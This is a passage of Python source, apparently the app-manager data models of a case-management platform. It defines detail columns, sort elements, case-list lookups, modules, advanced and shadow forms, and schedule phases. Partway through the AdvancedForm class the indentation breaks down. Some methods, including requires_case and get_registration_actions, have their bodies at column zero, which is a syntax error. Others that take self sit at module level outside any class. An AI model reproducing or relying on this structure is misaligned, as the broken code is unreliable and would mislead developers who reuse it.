            data['time_ago_interval'] = cls.TimeAgoInterval.get_from_old_format(data['format'])
            data['format'] = 'time-ago'
        # Lazy migration: enum used to be a dict, now is a list
        if isinstance(data.get('enum'), dict):
            data['enum'] = sorted(
                [{'key': key, 'value': value} for key, value in data['enum'].items()],
                key=lambda d: d['key'],
            )
        # Lazy migration: xpath expressions from format to first-class property
        if data.get('format') == 'calculate':
            property_xpath = PropertyXpathGenerator(None, None, None, super(DetailColumn, cls).wrap(data)).xpath
            data['field'] = dot_interpolate(data.get('calc_xpath', '.'), property_xpath)
            data['useXpathExpression'] = True
            data['hasAutocomplete'] = False
            data['format'] = 'plain'
        return super(DetailColumn, cls).wrap(data)

    @classmethod
    def from_json(cls, data):
        """Build a column from JSON, normalizing enum-image media paths."""
        from corehq.apps.app_manager.views.media_utils import interpolate_media_path
        to_ret = cls.wrap(data)
        if to_ret.format == 'enum-image':
            # interpolate icons-paths
            for item in to_ret.enum:
                for lang, path in six.iteritems(item.value):
                    item.value[lang] = interpolate_media_path(path)
        return to_ret

    @property
    def invisible(self):
        return self.format == 'invisible'
class SortElement(IndexedSchema):
    """A sort directive applied to the case list."""
    field = StringProperty()
    type = StringProperty()
    direction = StringProperty()
    blanks = StringProperty()
    # lang => localized display text shown for the sort property
    display = DictProperty()
    sort_calculation = StringProperty(default="")

    def has_display_values(self):
        # True when at least one localized display string is non-blank.
        return any(s.strip() != '' for s in self.display.values())
class CaseListLookupMixin(DocumentSchema):
    """
    Allows for the addition of Android Callouts to do lookups from the CaseList

        <lookup action="" image="" name="">
            <extra key="" value="" />
            <response key="" />
            <field>
                <header><text><locale id=""/></text></header>
                <template><text><xpath function=""/></text></template>
            </field>
        </lookup>
    """
    lookup_enabled = BooleanProperty(default=False)
    lookup_autolaunch = BooleanProperty(default=False)
    # Android intent action / name / icon for the callout
    lookup_action = StringProperty()
    lookup_name = StringProperty()
    lookup_image = JRResourceProperty(required=False)

    lookup_extras = SchemaListProperty()
    lookup_responses = SchemaListProperty()

    lookup_display_results = BooleanProperty(default=False)  # Display callout results in case list?
    # lang => localized header for the results column
    lookup_field_header = DictProperty()
    lookup_field_template = StringProperty()
class Detail(IndexedSchema, CaseListLookupMixin):
    """
    Full configuration for a case selection screen
    """
    display = StringProperty(choices=['short', 'long'])

    columns = SchemaListProperty(DetailColumn)
    get_columns = IndexedSchema.Getter('columns')

    tabs = SchemaListProperty(DetailTab)
    get_tabs = IndexedSchema.Getter('tabs')

    sort_elements = SchemaListProperty(SortElement)
    sort_nodeset_columns = BooleanProperty()
    filter = StringProperty()

    # If True, a small tile will display the case name after selection.
    persist_case_context = BooleanProperty()
    persistent_case_context_xml = StringProperty(default='case_name')

    # Custom variables to add into the <variables /> node
    custom_variables = StringProperty()

    # If True, use case tiles in the case list
    use_case_tiles = BooleanProperty()
    # If given, use this string for the case tile markup instead of the default template
    custom_xml = StringProperty()

    persist_tile_on_forms = BooleanProperty()
    # use case tile context persisted over forms from another module
    persistent_case_tile_from_module = StringProperty()
    # If True, the in form tile can be pulled down to reveal all the case details.
    pull_down_tile = BooleanProperty()

    print_template = DictProperty()

    def get_tab_spans(self):
        '''
        Return the starting and ending indices into self.columns delimiting
        the columns that should be in each tab.
        :return:
        '''
        tabs = list(self.get_tabs())
        ret = []
        for tab in tabs:
            try:
                # a tab ends where the next one starts...
                end = tabs[tab.id + 1].starting_index
            except IndexError:
                # ...or at the last column for the final tab
                end = len(self.columns)
            ret.append((tab.starting_index, end))
        return ret

    @parse_int([1])
    def get_column(self, i):
        # Negative indices wrap via the modulo before being attached as ids.
        return self.columns[i].with_id(i % len(self.columns), self)

    def rename_lang(self, old_lang, new_lang):
        for column in self.columns:
            column.rename_lang(old_lang, new_lang)

    def sort_nodeset_columns_for_detail(self):
        # Only long details with at least one nodeset tab sort nodeset columns.
        return (
            self.display == "long" and
            self.sort_nodeset_columns and
            any(tab for tab in self.get_tabs() if tab.has_nodeset)
        )
class CaseList(IndexedSchema, NavMenuItemMediaMixin):
    """Configuration of the case list menu item of a module."""
    # lang => localized label
    label = DictProperty()
    show = BooleanProperty(default=False)

    def rename_lang(self, old_lang, new_lang):
        _rename_key(self.label, old_lang, new_lang)

    def get_app(self):
        # _module is assigned by the owning module (ModuleBase.assign_references)
        return self._module.get_app()
class CaseSearchProperty(DocumentSchema):
    """
    Case properties available to search on.
    """
    name = StringProperty()
    # lang => localized label for the search field
    label = DictProperty()
class DefaultCaseSearchProperty(DocumentSchema):
    """Case Properties with fixed value to search on"""
    property = StringProperty()
    default_value = StringProperty()
class CaseSearch(DocumentSchema):
    """
    Properties and search command label
    """
    command_label = DictProperty(default={'en': 'Search All Cases'})
    properties = SchemaListProperty(CaseSearchProperty)
    # relevancy condition guarding the claim; defaults to the standard one
    relevant = StringProperty(default=CLAIM_DEFAULT_RELEVANT_CONDITION)
    search_button_display_condition = StringProperty()
    include_closed = BooleanProperty(default=False)
    default_properties = SchemaListProperty(DefaultCaseSearchProperty)
    blacklisted_owner_ids_expression = StringProperty()
class ParentSelect(DocumentSchema):
    """Configuration for selecting a parent case before the case list."""
    active = BooleanProperty(default=False)
    relationship = StringProperty(default='parent')
    # unique id of the module whose case list supplies the parent
    module_id = StringProperty()
class FixtureSelect(DocumentSchema):
    """
    Configuration for creating a details screen from a fixture which can be used to pre-filter
    cases prior to displaying the case list.

    fixture_type:       FixtureDataType.tag
    display_column:     name of the column to display in the list
    localize:           boolean if display_column actually contains the key for the localized string
    variable_column:    name of the column whose value should be saved when the user selects an item
    xpath:              xpath expression to use as the case filter
    """
    active = BooleanProperty(default=False)
    fixture_type = StringProperty()
    display_column = StringProperty()
    localize = BooleanProperty(default=False)
    variable_column = StringProperty()
    xpath = StringProperty(default='')
class DetailPair(DocumentSchema):
    """The short (case list) and long (case detail) screens for one entity."""
    short = SchemaProperty(Detail)
    long = SchemaProperty(Detail)

    @classmethod
    def wrap(cls, data):
        # Ensure the display discriminator is always consistent with the slot,
        # regardless of what was stored.
        self = super(DetailPair, cls).wrap(data)
        self.short.display = 'short'
        self.long.display = 'long'
        return self
class CaseListForm(NavMenuItemMediaMixin):
    """Registration form reachable directly from a module's case list."""
    form_id = FormIdProperty('modules[*].case_list_form.form_id')
    # lang => localized label
    label = DictProperty()
    post_form_workflow = StringProperty(
        default=WORKFLOW_DEFAULT,
        choices=REGISTRATION_FORM_WORFLOWS,
    )

    def rename_lang(self, old_lang, new_lang):
        _rename_key(self.label, old_lang, new_lang)

    def get_app(self):
        # _module is assigned by the owning module (ModuleBase.assign_references)
        return self._module.get_app()
class ModuleBase(IndexedSchema, ModuleMediaMixin, NavMenuItemMediaMixin, CommentMixin):
    """Common behavior for all module (menu) types: naming, form access,
    module hierarchy, and case-type bookkeeping.
    """
    # lang => localized module name
    name = DictProperty(six.text_type)
    unique_id = StringProperty()
    case_type = StringProperty()
    case_list_form = SchemaProperty(CaseListForm)
    module_filter = StringProperty()
    put_in_root = BooleanProperty(default=False)
    # unique_id of the parent module, when this module is nested
    root_module_id = StringProperty()
    fixture_select = SchemaProperty(FixtureSelect)
    auto_select_case = BooleanProperty(default=False)
    is_training_module = BooleanProperty(default=False)

    def __init__(self, *args, **kwargs):
        super(ModuleBase, self).__init__(*args, **kwargs)
        self.assign_references()

    @property
    def is_surveys(self):
        # A module with no case type is a plain survey menu.
        return self.case_type == ""

    def assign_references(self):
        # Give child schema objects a back-reference to their module.
        if hasattr(self, 'case_list'):
            self.case_list._module = self
        if hasattr(self, 'case_list_form'):
            self.case_list_form._module = self

    @classmethod
    def wrap(cls, data):
        """Dispatch wrapping to the concrete module class via doc_type."""
        if cls is ModuleBase:
            doc_type = data['doc_type']
            if doc_type == 'Module':
                return Module.wrap(data)
            elif doc_type == 'AdvancedModule':
                return AdvancedModule.wrap(data)
            elif doc_type == 'ReportModule':
                return ReportModule.wrap(data)
            elif doc_type == 'ShadowModule':
                return ShadowModule.wrap(data)
            else:
                raise ValueError('Unexpected doc_type for Module', doc_type)
        else:
            return super(ModuleBase, cls).wrap(data)

    def get_or_create_unique_id(self):
        """
        It is the caller's responsibility to save the Application
        after calling this function.

        WARNING: If called on the same doc in different requests without saving,
        this function will return a different uuid each time,
        likely causing unexpected behavior
        """
        if not self.unique_id:
            self.unique_id = uuid.uuid4().hex
        return self.unique_id

    get_forms = IndexedSchema.Getter('forms')

    def get_suite_forms(self):
        # Forms that should appear in the generated suite.
        return [f for f in self.get_forms() if not f.is_a_disabled_release_form()]

    @parse_int([1])
    def get_form(self, i):
        """Return form `i` bound to this module; raises FormNotFoundException."""
        try:
            # negative indices wrap via the modulo before being attached as ids
            return self.forms[i].with_id(i % len(self.forms), self)
        except IndexError:
            raise FormNotFoundException()

    def get_form_index(self, unique_id):
        """Index of the form with `unique_id`; raises FormNotFoundException."""
        for index, form in enumerate(self.get_forms()):
            if form.unique_id == unique_id:
                return index
        error = _("Could not find form with ID='{unique_id}' in module '{module_name}'.").format(
            module_name=self.name, unique_id=unique_id)
        raise FormNotFoundException(error)

    def get_child_modules(self):
        # Modules whose root_module_id points at this module.
        return [
            module for module in self.get_app().get_modules()
            if module.unique_id != self.unique_id and getattr(module, 'root_module_id', None) == self.unique_id
        ]

    @property
    def root_module(self):
        # None when this module is top-level (no root_module_id).
        if self.root_module_id:
            return self._parent.get_module_by_unique_id(self.root_module_id,
                error=_("Could not find parent menu for '{}'").format(self.default_name()))

    def requires_case_details(self):
        # Overridden by module types that show a case list.
        return False

    def root_requires_same_case(self):
        return self.root_module \
            and self.root_module.case_type == self.case_type \
            and self.root_module.all_forms_require_a_case()

    def get_case_types(self):
        return set([self.case_type])

    def get_app(self):
        return self._parent

    def default_name(self, app=None):
        """Best-effort display name, preferring the app's default language."""
        if not app:
            app = self.get_app()
        return trans(
            self.name,
            [app.default_language] + app.langs,
            include_lang=False
        )

    def rename_lang(self, old_lang, new_lang):
        _rename_key(self.name, old_lang, new_lang)
        for form in self.get_forms():
            form.rename_lang(old_lang, new_lang)
        # NOTE(review): the `_` here shadows the module-level gettext alias
        # within this method's scope -- harmless today but fragile.
        for _, detail, _ in self.get_details():
            detail.rename_lang(old_lang, new_lang)

    def get_form_by_unique_id(self, unique_id):
        # Returns None when no form matches.
        for form in self.get_forms():
            if form.get_unique_id() == unique_id:
                return form

    @property
    def validator(self):
        return ModuleBaseValidator(self)

    def validate_for_build(self):
        return self.validator.validate_for_build()

    @memoized
    def get_subcase_types(self):
        '''
        Return a set of each case type for which this module has a form that
        opens a new subcase of that type.
        '''
        subcase_types = set()
        for form in self.get_forms():
            if hasattr(form, 'get_subcase_types'):
                subcase_types.update(form.get_subcase_types())
        return subcase_types

    def get_custom_entries(self):
        """
        By default, suite entries are configured by forms, but you can also provide custom
        entries by overriding this function.

        See ReportModule for an example
        """
        return []

    def uses_media(self):
        """
        Whether the module uses media. If this returns false then media will not be generated
        for the module.
        """
        return True

    def uses_usercase(self):
        return False

    def add_insert_form(self, from_module, form, index=None, with_source=False):
        # Concrete module types decide which form types they accept.
        raise IncompatibleFormTypeException()

    def update_app_case_meta(self, app_case_meta):
        pass
class ModuleDetailsMixin(object):
    """Case/referral detail handling shared by Module-like classes.

    NOTE(review): rename_lang below calls ``super(Module, self)`` -- it
    hardcodes Module rather than the mixin's own MRO position, so this mixin
    only composes correctly with Module subclasses. Confirm before reusing.
    """

    @classmethod
    def wrap_details(cls, data):
        """Lazy migration: split a legacy 4-tuple 'details' entry into
        'case_details' and 'ref_details'; always drop the old key.
        """
        if 'details' in data:
            try:
                case_short, case_long, ref_short, ref_long = data['details']
            except ValueError:
                # "need more than 0 values to unpack"
                pass
            else:
                data['case_details'] = {
                    'short': case_short,
                    'long': case_long,
                }
                data['ref_details'] = {
                    'short': ref_short,
                    'long': ref_long,
                }
            finally:
                del data['details']
        return data

    @property
    def case_list_filter(self):
        try:
            return self.case_details.short.filter
        except AttributeError:
            return None

    @property
    def detail_sort_elements(self):
        try:
            return self.case_details.short.sort_elements
        except Exception:
            return []

    @property
    def search_detail(self):
        # A copy, so search-specific tweaks don't touch the stored detail.
        return deepcopy(self.case_details.short)

    def rename_lang(self, old_lang, new_lang):
        super(Module, self).rename_lang(old_lang, new_lang)
        for case_list in (self.case_list, self.referral_list):
            case_list.rename_lang(old_lang, new_lang)

    def export_json(self, dump_json=True, keep_unique_id=False):
        """Serialize the module; optionally strip form unique_ids for re-import."""
        source = self.to_json()
        if not keep_unique_id:
            for form in source['forms']:
                del form['unique_id']
        return json.dumps(source) if dump_json else source

    def get_details(self):
        """(name, detail, enabled) triples for every detail this module owns."""
        details = [
            ('case_short', self.case_details.short, True),
            ('case_long', self.case_details.long, True),
            ('ref_short', self.ref_details.short, False),
            ('ref_long', self.ref_details.long, False),
        ]
        if module_offers_search(self) and not self.case_details.short.custom_xml:
            details.append(('search_short', self.search_detail, True))
        return tuple(details)
class Module(ModuleBase, ModuleDetailsMixin):
    """
    A group of related forms, and configuration that applies to them all.
    Translates to a top-level menu on the phone.
    """
    module_type = 'basic'
    forms = SchemaListProperty(Form)
    case_details = SchemaProperty(DetailPair)
    ref_details = SchemaProperty(DetailPair)
    case_list = SchemaProperty(CaseList)
    referral_list = SchemaProperty(CaseList)
    task_list = SchemaProperty(CaseList)
    parent_select = SchemaProperty(ParentSelect)
    search_config = SchemaProperty(CaseSearch)
    display_style = StringProperty(default='list')

    @classmethod
    def wrap(cls, data):
        # Apply the legacy 'details' migration before normal schema wrapping.
        data = cls.wrap_details(data)
        return super(Module, cls).wrap(data)

    @classmethod
    def new_module(cls, name, lang):
        """Create a fresh module with a default 'Name' case-list column."""
        detail = Detail(
            columns=[DetailColumn(
                format='plain',
                header={(lang or 'en'): ugettext("Name")},
                field='name',
                model='case',
                hasAutocomplete=True,
            )]
        )
        module = cls(
            name={(lang or 'en'): name or ugettext("Untitled Module")},
            forms=[],
            case_type='',
            case_details=DetailPair(
                short=Detail(detail.to_json()),
                long=Detail(detail.to_json()),
            ),
        )
        module.get_or_create_unique_id()
        return module

    @classmethod
    def new_training_module(cls, name, lang):
        module = cls.new_module(name, lang)
        module.is_training_module = True
        return module

    def new_form(self, name, lang, attachment=Ellipsis):
        """Append a new form; Ellipsis sentinel means 'use blank form XML'."""
        from corehq.apps.app_manager.views.utils import get_blank_form_xml
        lang = lang if lang else "en"
        name = name if name else _("Untitled Form")
        form = Form(
            name={lang: name},
        )
        self.forms.append(form)
        # re-fetch so the form is bound to this module with an id
        form = self.get_form(-1)
        if attachment == Ellipsis:
            attachment = get_blank_form_xml(name)
        form.source = attachment
        return form

    def add_insert_form(self, from_module, form, index=None, with_source=False):
        """Insert `form` (or a basic copy of an action-less advanced form).

        Raises IncompatibleFormTypeException for advanced forms with actions.
        """
        if isinstance(form, Form):
            new_form = form
        elif isinstance(form, AdvancedForm) and not len(list(form.actions.get_all_actions())):
            new_form = Form(
                name=form.name,
                form_filter=form.form_filter,
                media_image=form.media_image,
                media_audio=form.media_audio
            )
            new_form._parent = self
            form._parent = self
            if with_source:
                new_form.source = form.source
        else:
            raise IncompatibleFormTypeException(_('''
                Cannot move an advanced form with actions into a basic menu.
            '''))
        if index is not None:
            self.forms.insert(index, new_form)
        else:
            self.forms.append(new_form)
        return self.get_form(index or -1)

    @property
    def validator(self):
        return ModuleValidator(self)

    def requires(self):
        """Strongest requirement among this module's forms and case lists,
        by precedence: referral > case > none.
        """
        r = set(["none"])
        for form in self.get_forms():
            r.add(form.requires)
        if self.case_list.show:
            r.add('case')
        if self.referral_list.show:
            r.add('referral')
        for val in ("referral", "case", "none"):
            if val in r:
                return val

    def requires_case_details(self):
        ret = False
        if self.case_list.show:
            return True
        for form in self.get_forms():
            if form.requires_case():
                ret = True
                break
        return ret

    @memoized
    def all_forms_require_a_case(self):
        return all([form.requires == 'case' for form in self.get_forms()])

    def uses_usercase(self):
        """Return True if this module has any forms that use the usercase.
        """
        return any(form.uses_usercase() for form in self.get_forms())

    def grid_display_style(self):
        return self.display_style == 'grid'

    def update_app_case_meta(self, meta):
        """Register this module's detail columns on the app case metadata,
        silently skipping columns the meta rejects.
        """
        from corehq.apps.reports.formdetails.readable import CaseMetaException
        for column in self.case_details.long.columns:
            try:
                meta.add_property_detail('long', self.case_type, self.unique_id, column)
            except CaseMetaException:
                pass
        for column in self.case_details.short.columns:
            try:
                meta.add_property_detail('short', self.case_type, self.unique_id, column)
            except CaseMetaException:
                pass
class AdvancedForm(IndexedFormBase, FormMediaMixin, NavMenuItemMediaMixin):
    """A form in an advanced module, using explicit load/update/open case
    actions (AdvancedFormActions) instead of the basic FormActions model.
    """
    form_type = 'advanced_form'
    # XPath expression controlling whether the form is shown in the menu
    form_filter = StringProperty()
    actions = SchemaProperty(AdvancedFormActions)
    # Visit schedule; None when the form is unscheduled
    schedule = SchemaProperty(FormSchedule, default=None)
    @classmethod
    def wrap(cls, data):
        # lazy migration to swap keys with values in action preload dict.
        # http://manage.dimagi.com/default.asp?162213
        load_actions = data.get('actions', {}).get('load_update_cases', [])
        for action in load_actions:
            preload = action['preload']
            # question paths start with '/': if a value looks like a path,
            # the dict was stored inverted -- flip it back
            if preload and list(preload.values())[0].startswith('/'):
                action['preload'] = {v: k for k, v in preload.items()}
        return super(AdvancedForm, cls).wrap(data)
    def pre_delete_hook(self):
        """Best-effort: detach the form from its schedule before deletion."""
        try:
            self.disable_schedule()
        except (ScheduleError, TypeError, AttributeError) as e:
            # Deliberately non-fatal: log and continue with the delete.
            logging.error("There was a {error} while running the pre_delete_hook on {form_id}. "
                          "There is probably nothing to worry about, but you could check to make sure "
                          "that there are no issues with this form.".format(error=e, form_id=self.unique_id))
            pass
    def get_action_type(self):
        """Summary string of action types, e.g. "load (a, b) open (c)"."""
        actions = self.actions.actions_meta_by_tag
        by_type = defaultdict(list)
        action_type = []
        # group the case tags by their action type
        for action_tag, action_meta in six.iteritems(actions):
            by_type[action_meta.get('type')].append(action_tag)
        for type, tag_list in six.iteritems(by_type):
            action_type.append('{} ({})'.format(type, ', '.join(filter(None, tag_list))))
        return ' '.join(action_type)
    def pre_move_hook(self, from_module, to_module):
        """Best-effort: detach the schedule when moving to another module."""
        if from_module != to_module:
            try:
                self.disable_schedule()
            except (ScheduleError, TypeError, AttributeError) as e:
                # Deliberately non-fatal: log and continue with the move.
                logging.error("There was a {error} while running the pre_move_hook on {form_id}. "
                              "There is probably nothing to worry about, but you could check to make sure "
                              "that there are no issues with this module.".format(error=e, form_id=self.unique_id))
                pass
    def add_stuff_to_xform(self, xform, build_profile_id=None):
        # Inject the advanced case/meta blocks on top of the base behavior.
        super(AdvancedForm, self).add_stuff_to_xform(xform, build_profile_id)
        xform.add_case_and_meta_advanced(self)
def requires_case(self):
"""Form requires a case that must be selected by the user (excludes autoloaded cases)
"""
return any(not action.auto_select for action in self.actions.load_update_cases)
@property
def requires(self):
return 'case' if self.requires_case() else 'none'
    @property
    def validator(self):
        # Build-time validation helper for advanced forms.
        return AdvancedFormValidator(self)
    def is_registration_form(self, case_type=None):
        """
        Defined as form that opens a single case. If the case is a sub-case then
        the form is only allowed to load parent cases (and any auto-selected cases).
        """
        reg_actions = self.get_registration_actions(case_type)
        if len(reg_actions) != 1:
            return False
        load_actions = [action for action in self.actions.load_update_cases if not action.auto_select]
        if not load_actions:
            return True
        reg_action = reg_actions[0]
        if not reg_action.case_indices:
            # a top-level open alongside user-selected loads: not a pure registration
            return False
        # walk up from the registration action, consuming its ancestors;
        # any action left over must be auto-select for this to qualify
        actions_by_tag = deepcopy(self.actions.actions_meta_by_tag)
        actions_by_tag.pop(reg_action.case_tag)

        def check_parents(tag):
            """Recursively check parent actions to ensure that all actions for this form are
            either parents of the registration action or else auto-select actions.
            """
            if not tag:
                return not actions_by_tag or all(
                    getattr(a['action'], 'auto_select', False) for a in actions_by_tag.values()
                )
            try:
                parent = actions_by_tag.pop(tag)
            except KeyError:
                return False
            return all(check_parents(p.tag) for p in parent['action'].case_indices)

        return all(check_parents(parent.tag) for parent in reg_action.case_indices)
def get_registration_actions(self, case_type=None):
"""
:return: List of actions that create a case. Subcase actions are included
as long as they are not inside a repeat. If case_type is not None
only return actions that create a case of the specified type.
"""
registration_actions = [
action for action in self.actions.get_open_actions()
if not action.is_subcase or not action.repeat_context
]
if case_type:
registration_actions = [a for a in registration_actions if a.case_type == case_type]
return registration_actions
def uses_case_type(self, case_type, invert_match=False):
def match(ct):
matches = ct == case_type
return not matches if invert_match else matches
return any(action for action in self.actions.load_update_cases if match(action.case_type))
def uses_usercase(self):
    # True when any load/update action targets the special usercase case type.
    return self.uses_case_type(USERCASE_TYPE)
def all_other_forms_require_a_case(self):
    """True when every *sibling* form in this module requires a case."""
    module = self.get_module()
    siblings = (form for form in module.get_forms() if form.id != self.id)
    return all(form.requires == 'case' for form in siblings)
def get_module(self):
    """Return the module that owns this form (the couch schema parent)."""
    return self._parent
def get_phase(self):
    """Return the schedule phase that contains this form, or None."""
    module = self.get_module()
    for phase in module.get_schedule_phases():
        for form in phase.get_forms():
            if form.unique_id == self.unique_id:
                return phase
    return None
def disable_schedule(self):
    """Turn off this form's schedule and detach the form from its phase, if any."""
    schedule = self.schedule
    if schedule:
        schedule.enabled = False
    phase = self.get_phase()
    if phase:
        phase.remove_form(self)
def get_case_updates(self):
    """Map each case type to the set of case-property keys this form can save.

    Combines explicit action case_properties with any updates contributed by
    the (enabled) visit scheduler embedded in the form XML.
    """
    updates_by_case_type = defaultdict(set)
    format_key = self.get_case_property_name_formatter()
    for action in self.actions.get_all_actions():
        case_type = action.case_type
        updates_by_case_type[case_type].update(
            format_key(*item) for item in six.iteritems(action.case_properties))
    # Scheduler updates only exist when scheduling is enabled and the form
    # actually has XML source to parse.
    if self.schedule and self.schedule.enabled and self.source:
        xform = self.wrapped_xform()
        self.add_stuff_to_xform(xform)
        scheduler_updates = xform.get_scheduler_case_updates()
    else:
        scheduler_updates = {}
    for case_type, updates in scheduler_updates.items():
        updates_by_case_type[case_type].update(updates)
    return updates_by_case_type
@memoized
def get_all_contributed_subcase_properties(self):
    """Map each subcase case type to the set of case properties this form
    can contribute to it."""
    properties_by_type = defaultdict(set)
    for subcase in self.actions.get_subcase_actions():
        properties_by_type[subcase.case_type].update(subcase.case_properties.keys())
    return properties_by_type
@memoized
def get_contributed_case_relationships(self):
    """Map each child case type to the set of (parent_case_type, relationship)
    pairs this form's subcase actions create.

    ``relationship`` falls back to 'parent' when the case index has no
    explicit reference_id.
    """
    case_relationships_by_child_type = defaultdict(set)
    for subcase in self.actions.get_subcase_actions():
        child_case_type = subcase.case_type
        for case_index in subcase.case_indices:
            # Resolve the index tag back to the action that loads/opens the parent.
            parent = self.actions.get_action_from_tag(case_index.tag)
            if parent:
                case_relationships_by_child_type[child_case_type].add(
                    (parent.case_type, case_index.reference_id or 'parent'))
    return case_relationships_by_child_type
def update_app_case_meta(self, app_case_meta):
    """Register this form's case-property saves/loads and case open/close
    events on the app-wide case metadata object (mutates ``app_case_meta``).
    """
    from corehq.apps.reports.formdetails.readable import FormQuestionResponse
    # Index questions by their value (path) for quick lookup below.
    questions = {
        q['value']: FormQuestionResponse(q)
        for q in self.get_questions(self.get_app().langs, include_translations=True)
    }
    self._add_save_to_case_questions(questions, app_case_meta)
    # Load/update actions: property saves, preloads, and closers.
    for action in self.actions.load_update_cases:
        for name, question_path in action.case_properties.items():
            self.add_property_save(
                app_case_meta,
                action.case_type,
                name,
                questions,
                question_path
            )
        for question_path, name in action.preload.items():
            self.add_property_load(
                app_case_meta,
                action.case_type,
                name,
                questions,
                question_path
            )
        if action.close_condition.is_active():
            meta = app_case_meta.get_type(action.case_type)
            meta.add_closer(self.unique_id, action.close_condition)
    # Open actions: the case name save, property saves, opener and closer.
    for action in self.actions.open_cases:
        self.add_property_save(
            app_case_meta,
            action.case_type,
            'name',
            questions,
            action.name_path,
            action.open_condition
        )
        for name, question_path in action.case_properties.items():
            self.add_property_save(
                app_case_meta,
                action.case_type,
                name,
                questions,
                question_path,
                action.open_condition
            )
        meta = app_case_meta.get_type(action.case_type)
        meta.add_opener(self.unique_id, action.open_condition)
        if action.close_condition.is_active():
            meta.add_closer(self.unique_id, action.close_condition)
class ShadowForm(AdvancedForm):
    """An advanced form that delegates its XML source and base actions to
    another ("shadow parent") advanced form, while allowing extra actions
    of its own to be merged on top.
    """
    form_type = 'shadow_form'
    # The unique id of the form we are shadowing
    shadow_parent_form_id = FormIdProperty("modules[*].forms[*].shadow_parent_form_id")

    # form actions to be merged with the parent actions
    extra_actions = SchemaProperty(AdvancedFormActions)

    def __init__(self, *args, **kwargs):
        super(ShadowForm, self).__init__(*args, **kwargs)
        # Memoized resolved parent form; see the shadow_parent_form property.
        self._shadow_parent_form = None

    @property
    def shadow_parent_form(self):
        """The resolved parent form, or None when unset or not found."""
        if not self.shadow_parent_form_id:
            return None
        else:
            # Re-resolve when the cached form no longer matches the stored id.
            if not self._shadow_parent_form or self._shadow_parent_form.unique_id != self.shadow_parent_form_id:
                app = self.get_app()
                try:
                    self._shadow_parent_form = app.get_form(self.shadow_parent_form_id)
                except FormNotFoundException:
                    self._shadow_parent_form = None
            return self._shadow_parent_form

    @property
    def source(self):
        # A shadow form has no XML of its own: it exposes its parent's source,
        # or a blank form when the parent is missing.
        if self.shadow_parent_form:
            return self.shadow_parent_form.source
        from corehq.apps.app_manager.views.utils import get_blank_form_xml
        return get_blank_form_xml("")

    def get_validation_cache(self):
        # Validation is delegated to the parent since the XML lives there.
        if not self.shadow_parent_form:
            return None
        return self.shadow_parent_form.validation_cache

    def set_validation_cache(self, cache):
        if self.shadow_parent_form:
            self.shadow_parent_form.validation_cache = cache

    @property
    def xmlns(self):
        # Shares the parent's xmlns; None when no parent is resolved.
        if not self.shadow_parent_form:
            return None
        else:
            return self.shadow_parent_form.xmlns

    @property
    def actions(self):
        """Parent actions overlaid with this form's extra_actions."""
        if not self.shadow_parent_form:
            shadow_parent_actions = AdvancedFormActions()
        else:
            shadow_parent_actions = self.shadow_parent_form.actions
        return self._merge_actions(shadow_parent_actions, self.extra_actions)

    @property
    def validator(self):
        return ShadowFormValidator(self)

    def get_shadow_parent_options(self):
        """(unique_id, label) choices of advanced forms eligible as the parent.

        If the currently-stored parent id is not among them (e.g. deleted),
        it is prepended with an "Unknown" label so the UI can flag it.
        """
        options = [
            (form.get_unique_id(), '{} / {}'.format(form.get_module().default_name(), form.default_name()))
            for form in self.get_app().get_forms() if form.form_type == "advanced_form"
        ]
        if self.shadow_parent_form_id and self.shadow_parent_form_id not in [x[0] for x in options]:
            options = [(self.shadow_parent_form_id, ugettext_lazy("Unknown, please change"))] + options
        return options

    @staticmethod
    def _merge_actions(source_actions, extra_actions):
        """Merge the parent's load/update actions with the shadow form's own.

        For each extra action: start from a copy of the parent action with
        the same case_tag (or a fresh action), then overwrite the listed
        properties from the extra action.
        """
        new_actions = []
        source_action_map = {
            action.case_tag: action
            for action in source_actions.load_update_cases
        }
        # Properties the shadow form is allowed to override on each action.
        overwrite_properties = [
            "case_type",
            "details_module",
            "auto_select",
            "load_case_from_fixture",
            "show_product_stock",
            "product_program",
            "case_index",
        ]
        for action in extra_actions.load_update_cases:
            if action.case_tag in source_action_map:
                # wrap(to_json()) produces an independent copy of the parent action.
                new_action = LoadUpdateAction.wrap(source_action_map[action.case_tag].to_json())
            else:
                new_action = LoadUpdateAction(case_tag=action.case_tag)
            for prop in overwrite_properties:
                setattr(new_action, prop, getattr(action, prop))
            new_actions.append(new_action)
        return AdvancedFormActions(
            load_update_cases=new_actions,
            open_cases=source_actions.open_cases,  # Shadow form is not allowed to specify any open case actions
        )
class SchedulePhaseForm(IndexedSchema):
    """
    A reference to a form in a schedule phase.
    """
    # unique_id of the referenced form
    form_id = FormIdProperty("modules[*].schedule_phases[*].forms[*].form_id")
class SchedulePhase(IndexedSchema):
    """
    SchedulePhases are attached to a module.

    A Schedule Phase is a grouping of forms that occur within a period and share an anchor
    A module should not have more than one SchedulePhase with the same anchor

    anchor: Case property containing a date after which this phase becomes active
    forms: The forms that are to be filled out within this phase
    """
    anchor = StringProperty()
    forms = SchemaListProperty(SchedulePhaseForm)

    @property
    def id(self):
        """ A Schedule Phase is 1-indexed """
        _id = super(SchedulePhase, self).id
        return _id + 1

    @property
    def phase_id(self):
        # Stable identifier combining the anchor property and the 1-based index.
        return "{}_{}".format(self.anchor, self.id)

    def get_module(self):
        """Return the module that owns this phase (the couch schema parent)."""
        return self._parent

    # Raw SchedulePhaseForm references (not the form docs themselves).
    _get_forms = IndexedSchema.Getter('forms')

    def get_forms(self):
        """Returns the actual form objects related to this phase"""
        module = self.get_module()
        return (module.get_form_by_unique_id(form.form_id) for form in self._get_forms())

    def get_form(self, desired_form):
        """Return the phase's copy of ``desired_form`` (matched by unique_id), or None."""
        return next((form for form in self.get_forms() if form.unique_id == desired_form.unique_id), None)

    def get_phase_form_index(self, form):
        """
        Returns the index of the form with respect to the phase

        schedule_phase.forms = [a,b,c]
        schedule_phase.get_phase_form_index(b)
        => 1
        schedule_phase.get_phase_form_index(c)
        => 2
        """
        return next((phase_form.id for phase_form in self._get_forms() if phase_form.form_id == form.unique_id),
                    None)

    def remove_form(self, form):
        """Remove a form from the phase"""
        idx = self.get_phase_form_index(form)
        if idx is None:
            raise ScheduleError("That form doesn't exist in the phase")
        self.forms.remove(self.forms[idx])

    def add_form(self, form):
        """Adds a form to this phase, removing it from other phases"""
        old_phase = form.get_phase()
        # A form may stay in place when its current phase shares this anchor.
        if old_phase is not None and old_phase.anchor != self.anchor:
            old_phase.remove_form(form)
        if self.get_form(form) is None:
            self.forms.append(SchedulePhaseForm(form_id=form.unique_id))

    def change_anchor(self, new_anchor):
        """Rename this phase's anchor; raises ScheduleError on blank or duplicate anchors.

